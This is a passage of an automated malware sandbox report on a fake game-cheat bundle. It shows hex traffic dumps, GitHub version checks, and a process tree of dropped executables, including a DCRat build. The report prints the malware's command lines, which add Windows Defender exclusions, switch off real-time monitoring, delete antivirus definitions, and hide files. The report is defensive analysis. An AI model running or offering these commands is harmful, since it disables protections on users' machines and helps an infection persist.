                                                  2024-06-21 02:27:40 UTC16384OUTData Raw: a3 52 3a 2a 75 53 61 93 e7 bd c4 05 6b 68 e5 0f 91 03 b4 8b c9 46 f0 e8 80 e8 59 53 af 0e 43 82 44 e3 b4 5e bb 43 9a 45 70 00 d2 fb 0c c5 5a 56 54 d1 75 29 69 be 27 26 51 ad b4 48 47 c0 11 a1 8a 74 97 3a ba 98 3d c1 8f ae 7d 4e 64 cb 92 15 bc a3 c6 e2 39 b6 4a c5 2e df d3 18 21 98 62 de de 00 ce 8d c2 22 b9 80 89 b3 5e 41 55 1e e7 5e 1b 1c 5e e9 27 3e 32 58 30 5f 32 af d8 5e 35 ae 94 c7 9b 13 6b 38 cb d3 79 74 85 dd 4c be c2 d4 34 fa 95 eb ae 79 52 fe b0 e6 a4 92 7c 78 db 79 17 48 6b b1 87 3d e7 d8 80 4a 10 59 33 51 d4 eb 9f 94 5b bb 64 e6 bb 2e 50 d7 02 e8 30 e2 df b5 a1 e8 1d 3a 5d 6a 77 1e 33 ec c2 a2 10 92 6f 55 0a 04 dc 79 23 4c 4d 45 9d 8f 5b 72 4f f4 70 45 dd 19 26 47 b8 45 2f a3 48 66 ec 3c c5 69 e8 fe 27 a1 2a 10 c6 e3 22 5f 98 25 4f d2 55 d7 66
                                                  Data Ascii: R:*uSakhFYSCD^CEpZVTu)i'&QHGt:=}Nd9J.!b"^AU^^'>2X0_2^5k8ytL4yR|xyHk=JY3Q[d.P0:]jw3oUy#LME[rOpE&GE/Hf<i'*"_%OUf
                                                  2024-06-21 02:27:40 UTC16384OUTData Raw: 9e a4 92 6b fc d6 a1 ba e1 4d 58 c3 f9 07 c3 ae e8 c4 b4 f8 40 58 d7 11 b0 b5 0b 1c 5b f1 56 a0 3e 1a bc 96 e4 06 f4 46 7f da 36 3f 5f 9f b7 f4 6d aa 36 12 36 42 c2 46 f9 0f bf 15 e5 63 f5 22 0c d6 3e d6 42 43 1b d1 e3 c4 0b da 92 7a 84 87 d0 ff cc 2e 22 77 f9 28 e3 f4 99 ae b6 c7 ad 11 c2 6c 7e 3e d7 95 23 bb c8 83 e4 a0 47 c0 e3 2f 48 2d 65 57 9f ed b3 15 7c f5 e6 21 99 f5 9f e7 a2 1a dd be 72 02 b9 20 06 8f 0b 89 e4 56 37 79 b8 fe 09 d3 6c b2 da 70 f0 2b 6e b6 99 87 a2 e3 18 b8 a4 9b ec 92 3e 4d 95 aa 9c 1c f9 3b 23 18 0d cd 27 97 86 15 5e 35 a0 a4 3b 15 bb 2f bf 07 9a dc d0 9f 0b 02 8c 5d 42 60 9e 18 00 96 61 5f 09 43 7c 3f bc 1d 4c bc 9f a0 b3 67 4a 74 60 2b b5 6a 4a 5a 0c b4 b0 16 3e f8 6c eb dd 88 c8 1a d4 ef ab 39 d2 e9 c2 83 7b 7b 0d cf c4 dd 67
                                                  Data Ascii: kMX@X[V>F6?_m66BFc">BCz."w(l~>#G/H-eW|!r V7ylp+n>M;#'^5;/]B`a_C|?LgJt`+jJZ>l9{{g
                                                  2024-06-21 02:27:40 UTC16384OUTData Raw: 0f fc 1b 50 55 b9 46 cb a3 9e 6a 29 33 38 0a 92 9c 1a 18 56 6f 49 a3 c2 f1 25 58 f3 3e eb 12 6e 90 8f cb 4b 2c d8 f6 d1 80 ac 8a 44 70 8c cc 4f c3 4d b8 f6 ac 30 01 36 99 7c 2a fc 88 29 16 11 e7 25 64 0c a9 e2 63 1c 35 ad d5 92 08 71 34 af 3d 62 d2 2a 35 20 c5 88 a4 3f 85 a1 f4 5b a0 a4 b8 ff b6 d3 57 e9 ad 10 a6 f0 c7 b1 06 7f 39 40 2d 3d 0e 57 88 d6 79 73 fd 9e 98 b4 f2 01 4c 40 02 5d f8 4c a1 0d b4 0f 41 8a db d7 f2 4f 52 2a ae 67 00 d7 e3 55 6c 4d 9d da 8c 99 21 d7 ef fd c1 6f cb c1 b2 4d c8 d6 71 82 4b 17 13 ff 4e 39 b5 02 9e 4c b3 65 83 3a 1e 20 61 7f e1 c1 ba 6a f2 85 82 70 0c 57 12 ae 59 03 fb c8 45 61 d8 88 d0 de a7 35 07 9e 9d 10 a3 a1 ec a5 55 6a 5e 56 fb c6 ef 8a de 2e 1c 46 ae e3 34 61 72 6c e8 8c 66 58 dd 21 e7 f9 bd 05 70 42 ed cc 78 b0 c6
                                                  Data Ascii: PUFj)38VoI%X>nK,DpOM06|*)%dc5q4=b*5 ?[W9@-=WysL@]LAOR*gUlM!oMqKN9Le: ajpWYEa5Uj^V.F4arlfX!pBx
                                                  2024-06-21 02:27:40 UTC16384OUTData Raw: 85 bd 59 3a 0c 8d 06 ea df 2b 87 0f 4a 12 66 12 c5 68 e7 32 70 ac e4 9d 8e c8 c7 37 d8 d4 2e 16 f3 e0 bd 10 9b 0a f5 1b 91 f6 2b a3 01 58 31 a7 83 cd 1f 6d 72 f8 77 31 4a d8 43 c7 76 33 8b c1 a4 80 28 42 f9 6c 3c 9a ca e2 ac 7c 6d c8 ed 54 76 eb 65 87 e2 6e 89 ec bc 99 99 f8 7a 47 55 64 09 eb 84 f5 18 5f ac 5c 04 e1 79 22 7c a0 2b df bb e5 9f 35 36 6e a7 68 3b 79 b9 39 b9 43 cc 54 8e e0 73 6d d3 6b ca 07 b5 8a 10 1d 05 cf a8 5f c1 65 77 ba b2 eb de 68 1c 6d 39 18 19 e2 10 85 ff 51 a8 3f a2 9e 90 93 be 61 68 4e ab 38 f0 8d dd 1d 76 b0 6d 30 fc 46 05 73 be 95 f2 7c c4 71 fe 39 c8 86 8c a6 f4 e4 e3 a9 22 8d 8f 74 be 22 ad 70 30 a4 05 28 6b fd 8d cc ad f3 eb 77 13 de 17 68 1b 01 04 9a 23 00 e2 bc 3e e5 12 e6 91 76 f8 a5 08 b7 f2 fd 1f 9a 91 ef 26 64 b1 3e d9
                                                  Data Ascii: Y:+Jfh2p7.+X1mrw1JCv3(Bl<|mTvenzGUd_\y"|+56nh;y9CTsmk_ewhm9Q?ahN8vm0Fs|q9"t"p0(kwh#>v&d>
                                                  2024-06-21 02:27:40 UTC16384OUTData Raw: 43 0a d1 d1 e1 b5 1e ea 5a 4d 1e 0a 1e e3 86 c8 30 24 cd c6 50 8a 04 f7 b9 93 32 66 e0 77 ab 09 a9 e9 f7 c5 92 a2 de 68 e3 58 fc 03 44 00 c1 c6 53 b7 69 0d 0c f1 bf b6 45 66 d7 57 33 46 4b 6b cf 2c 93 a6 90 4c e0 04 e7 16 9f cc 48 2a de 86 70 8e 77 11 e1 9e 43 9a a6 c9 9c 28 af a9 8e 90 e7 4a 83 4f ba f2 4c dd f2 6e 19 38 30 6b 82 48 c2 cc 5d 14 98 b3 2d 78 b8 9f cd 0a ed 23 2a 6f dd 07 7f aa e9 b0 64 47 d4 30 ff 15 ab 57 c4 a2 97 17 a2 93 b2 4e fe 19 0e 2c bf df 83 27 1a e9 4d a8 2d b6 e8 4f 45 04 bf 9b 81 6f 29 00 fe 21 b8 92 8d 50 89 ab 1e 36 b7 e0 6a d5 fb 68 de 2a 93 09 9f 9c f2 26 f1 c7 8f a5 71 99 28 9d 76 92 01 8c 5c e3 a8 af 4b c0 de 03 4c c0 49 12 45 98 9f 55 2d f6 44 36 02 47 53 3e 19 5b 5f d6 21 57 1a 28 1c da 69 e0 ce c3 b8 8f 5d c2 78 63 54
                                                  Data Ascii: CZM0$P2fwhXDSiEfW3FKk,LH*pwC(JOLn80kH]-x#*odG0WN,'M-OEo)!P6jh*&q(v\KLIEU-D6GS>[_!W(i]xcT
                                                  2024-06-21 02:27:40 UTC16384OUTData Raw: a1 e0 a8 fe d3 ec 91 ee 21 0f 4c ee 09 7b 47 91 91 e8 1a 50 53 c5 45 a4 6c e2 67 0a b6 1a eb f0 bd f2 3f 16 80 98 30 87 06 10 2f 78 77 8f 07 0b c8 53 0d 24 63 44 56 64 c9 db d8 7a bc 50 58 be b9 b0 c3 e7 ac 4b 8b 0d be 58 71 c9 51 a0 cd 4c af 22 3a 6c 83 3e 9a 11 e9 7c e9 b4 af cf 02 ae 68 8b 0d ea e4 6a 9a 2c 8d 03 fe 88 dc 5d a1 68 75 16 8b 93 bb 8f 1e 44 0e fe 54 7d 12 b4 6d 45 29 c8 45 e5 21 e1 8b 52 b1 be a4 4b 6d 1d ac bb 95 c0 60 f4 4f ec 4d c7 e5 83 12 73 87 35 9a 92 d2 e1 93 08 4c a1 ae af 61 0b f0 98 f5 d7 e7 96 9f bb bd c7 f6 04 17 30 3f 5f ed c5 bd 93 31 80 ef 94 9d d6 08 35 d8 dd aa ae 55 43 c0 53 af a3 2a 57 9b 63 a0 2b ae 4b 49 27 46 29 6e 88 7a 1c 39 c1 7c 89 c5 7b 7a 0d bd b5 7e 02 e6 6c a4 9b d4 25 49 0e cf 09 07 d2 29 da a5 7b 0e 6e b7
                                                  Data Ascii: !L{GPSElg?0/xwS$cDVdzPXKXqQL":l>|hj,]huDT}mE)E!RKm`OMs5La0?_15UCS*Wc+KI'F)nz9|{z~l%I){n
                                                  2024-06-21 02:27:40 UTC16384OUTData Raw: 3c dd ec 02 6e da a8 4d 14 1a 50 9b 89 28 1f ac 46 66 5c 5f 0b 74 a2 e5 3a c0 b5 64 92 e1 1d 0c 30 88 0c 10 18 33 d5 8f e1 14 ae 4a 58 ba 61 84 b2 ce 39 ec 88 1e 38 82 6b ac 5a 1c 25 e6 9e 72 1a 28 f6 cb 45 7a e1 69 ab e0 fe dd 19 6f 88 fa bb f4 5c 7d 1c be 25 ee 8e a1 83 cc 2a 72 bf d0 45 98 da 21 d2 47 eb 16 f7 a6 dd 74 ed ae 40 b4 ea 37 03 29 a5 80 0a bb b7 75 88 5e 32 56 72 67 b2 43 d9 15 d6 10 a0 d5 0b 6b 10 88 83 1d 27 c5 87 62 11 4d aa 9c d4 7f 23 79 75 c1 08 80 94 04 57 12 94 5f ba 2d a5 37 4f 17 e3 af 42 b4 6c 7b 10 a4 fd 7c ea ba 95 b3 ad 76 53 ce 54 d3 32 16 94 8d 82 e4 72 aa 08 d4 09 bd 6c a2 35 3d d5 10 c0 d7 95 bd bf af 86 aa 83 8f 40 29 0f c8 7d a3 b6 aa b8 b4 c9 05 a7 54 c3 59 d2 20 d2 33 12 94 7e 5e 83 3d 7c 11 ca 05 f9 b9 e1 b5 06 7d 00
                                                  Data Ascii: <nMP(Ff\_t:d03JXa98kZ%r(Ezio\}%*rE!Gt@7)u^2VrgCk'bM#yuW_-7OBl{|vST2rl5=@)}TY 3~^=|}
                                                  2024-06-21 02:27:40 UTC16384OUTData Raw: 72 75 88 1b 56 5d 44 7e 8b 85 7e 8b 71 88 8a f9 8f 4d a4 31 ee d6 05 1e 79 31 aa 4b 4b 09 7d 96 72 44 5c 24 39 41 85 0d 32 b3 d3 45 78 22 fc fd 63 23 b8 f7 2d 3d 15 27 b0 b6 7d 98 6c 15 4c e7 5d f6 19 27 8c 64 b7 78 ac 6a 8c a5 ea 65 d3 39 41 e0 db d6 9f dd c2 96 13 f8 ef 15 3f c3 cb a8 9f 3f 80 4b 7f ad 4e 9d a4 b7 a3 57 8d 95 eb 4b 63 a7 0f 98 18 e5 72 bc 62 15 6f 7a a2 7a 3f 1d 10 24 ed dc 3e 09 3b 22 6a 66 94 38 b1 38 2b 56 e4 e8 08 8c ec c0 69 37 15 ce de e5 30 0c ff c4 5b a3 f8 a2 9f 0a e3 18 96 c0 45 b2 32 ad ab 8b b7 fb 84 cf 8a dc 77 88 be 9b 63 a2 5a 78 56 e5 78 e3 84 df 85 d2 14 3b c4 32 83 a3 c6 d5 d7 e2 5d 21 96 43 a0 a7 07 81 43 b2 7e 82 76 fe 11 ca fa 3f 65 fc 6c d7 c7 53 bc cd c2 0d a4 2c 9f 93 f1 51 5b 60 98 3c 38 f5 29 0c 06 c2 59 ac 86
                                                  Data Ascii: ruV]D~~qM1y1KK}rD\$9A2Ex"c#-='}lL]'dxje9A??KNWKcrbozz?$>;"jf88+Vi70[E2wcZxVx;2]!CC~v?elS,Q[`<8)Y
                                                  2024-06-21 02:27:40 UTC389INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0
                                                  Date: Fri, 21 Jun 2024 02:27:40 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 1652
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.449748185.199.111.133443744C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-06-21 02:27:43 UTC111OUTGET /quivings/Solara/main/Storage/version.txt HTTP/1.1
                                                  User-Agent: Solara
                                                  Host: raw.githubusercontent.com
                                                  2024-06-21 02:27:43 UTC895INHTTP/1.1 200 OK
                                                  Connection: close
                                                  Content-Length: 5
                                                  Cache-Control: max-age=300
                                                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                  Content-Type: text/plain; charset=utf-8
                                                  ETag: "ddfef11647d6ae6000e0fb99e9e6c4bd25fb5c107ecb19358718a3a456e5c03f"
                                                  Strict-Transport-Security: max-age=31536000
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: deny
                                                  X-XSS-Protection: 1; mode=block
                                                  X-GitHub-Request-Id: 8A04:27FFD8:2DD6A:35AE8:6674D21E
                                                  Accept-Ranges: bytes
                                                  Date: Fri, 21 Jun 2024 02:27:43 GMT
                                                  Via: 1.1 varnish
                                                  X-Served-By: cache-nyc-kteb1890033-NYC
                                                  X-Cache: HIT
                                                  X-Cache-Hits: 1
                                                  X-Timer: S1718936863.363510,VS0,VE1
                                                  Vary: Authorization,Accept-Encoding,Origin
                                                  Access-Control-Allow-Origin: *
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  X-Fastly-Request-ID: 2c24f5f5ba09bcc8f1268b805d6ef033b57b337f
                                                  Expires: Fri, 21 Jun 2024 02:32:43 GMT
                                                  Source-Age: 170
                                                  2024-06-21 02:27:43 UTC5INData Raw: 32 2e 33 39 0a
                                                  Data Ascii: 2.39


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4192.168.2.454417185.199.111.133443
                                                  TimestampBytes transferredDirectionData
                                                  2024-06-21 02:27:46 UTC115OUTGET /quivings/Solara/main/Storage/patched.txt HTTP/1.1
                                                  Host: raw.githubusercontent.com
                                                  Connection: Keep-Alive
                                                  2024-06-21 02:27:46 UTC888INHTTP/1.1 200 OK
                                                  Connection: close
                                                  Content-Length: 2
                                                  Cache-Control: max-age=300
                                                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                  Content-Type: text/plain; charset=utf-8
                                                  ETag: "be7db9be1deadfdc76d20b8c3af37b22cb526ff56f85be6dc9d41c18ef6176db"
                                                  Strict-Transport-Security: max-age=31536000
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: deny
                                                  X-XSS-Protection: 1; mode=block
                                                  X-GitHub-Request-Id: 8C36:178A7F:3BB27:42F89:6674D110
                                                  Accept-Ranges: bytes
                                                  Date: Fri, 21 Jun 2024 02:27:46 GMT
                                                  Via: 1.1 varnish
                                                  X-Served-By: cache-ewr18142-EWR
                                                  X-Cache: HIT
                                                  X-Cache-Hits: 1
                                                  X-Timer: S1718936866.156837,VS0,VE1
                                                  Vary: Authorization,Accept-Encoding,Origin
                                                  Access-Control-Allow-Origin: *
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  X-Fastly-Request-ID: c64a50578e8dbe08591fc3300c00239d5de215d4
                                                  Expires: Fri, 21 Jun 2024 02:32:46 GMT
                                                  Source-Age: 243
                                                  2024-06-21 02:27:46 UTC2INData Raw: 6e 0a
                                                  Data Ascii: n


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:22:27:08
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\Desktop\QIjBj1l8We.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\QIjBj1l8We.exe"
                                                  Imagebase:0x400000
                                                  File size:12'016'128 bytes
                                                  MD5 hash:48A8EE49651A74A74BACA1F7C94729E5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:22:27:08
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\x12.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x12.exe"
                                                  Imagebase:0x400000
                                                  File size:12'007'936 bytes
                                                  MD5 hash:A236344BCC36451B5760C4BF40DF3CDA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:22:27:10
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\x11.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x11.exe"
                                                  Imagebase:0x400000
                                                  File size:12'000'768 bytes
                                                  MD5 hash:34CB7FCA8CB671327865D0BCF6DE72BC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:22:27:10
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\x10.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x10.exe"
                                                  Imagebase:0x400000
                                                  File size:11'992'576 bytes
                                                  MD5 hash:B93FC536DF3C66E783FCBB9071DB7545
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:22:27:11
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\x9.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x9.exe"
                                                  Imagebase:0x400000
                                                  File size:11'985'408 bytes
                                                  MD5 hash:7E5F18A5C7EB009E54AE4FC6127E864C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:22:27:12
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\x8.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x8.exe"
                                                  Imagebase:0x400000
                                                  File size:11'977'216 bytes
                                                  MD5 hash:DD97AAB085B140B715DD1A52038E3C70
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:22:27:13
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\x7.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x7.exe"
                                                  Imagebase:0x400000
                                                  File size:11'970'048 bytes
                                                  MD5 hash:0E9FEE8861C55C0EBADC5F678FBD8A9A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:22:27:14
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\x6.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x6.exe"
                                                  Imagebase:0x400000
                                                  File size:11'961'856 bytes
                                                  MD5 hash:61F5D17C10DE6541139134FB7058F88E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:22:27:15
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\x5.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x5.exe"
                                                  Imagebase:0x400000
                                                  File size:11'955'200 bytes
                                                  MD5 hash:8DBEE0CB9B7550432DF6BEB4D9EA5CF0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:22:27:16
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\x4.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x4.exe"
                                                  Imagebase:0x400000
                                                  File size:11'947'008 bytes
                                                  MD5 hash:609A00E116060457295CE9293E6E3B3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:22:27:17
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe"
                                                  Imagebase:0x400000
                                                  File size:11'960'320 bytes
                                                  MD5 hash:108590051FAB4871AF861B8B12AD1E96
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 96%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:22:27:18
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
                                                  Imagebase:0xd40000
                                                  File size:4'552'800 bytes
                                                  MD5 hash:2EDB71DD3792B6F6A774EDBF67BB78D2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 71%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:22:27:18
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\agentInto\ygzWE.vbe"
                                                  Imagebase:0xa40000
                                                  File size:147'456 bytes
                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:22:27:19
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Built.exe"
                                                  Imagebase:0x7ff7eefa0000
                                                  File size:25'165'824 bytes
                                                  MD5 hash:68D3EA3AFA53DEDFD3593D140747B932
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 45%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:22:27:19
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
                                                  Imagebase:0xee0000
                                                  File size:13'312 bytes
                                                  MD5 hash:6557BD5240397F026E675AFB78544A26
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 21%, ReversingLabs
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:22:27:19
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:22:27:19
                                                  Start date:20/06/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Built.exe"
                                                  Imagebase:0x7ff7eefa0000
                                                  File size:25'165'824 bytes
                                                  MD5 hash:68D3EA3AFA53DEDFD3593D140747B932
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:22:27:20
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:22:27:20
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:22:27:20
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:22:27:20
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe""
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:22:27:20
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:22
                                                  Start time:22:27:20
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:23
                                                  Start time:22:27:20
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:22:27:20
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
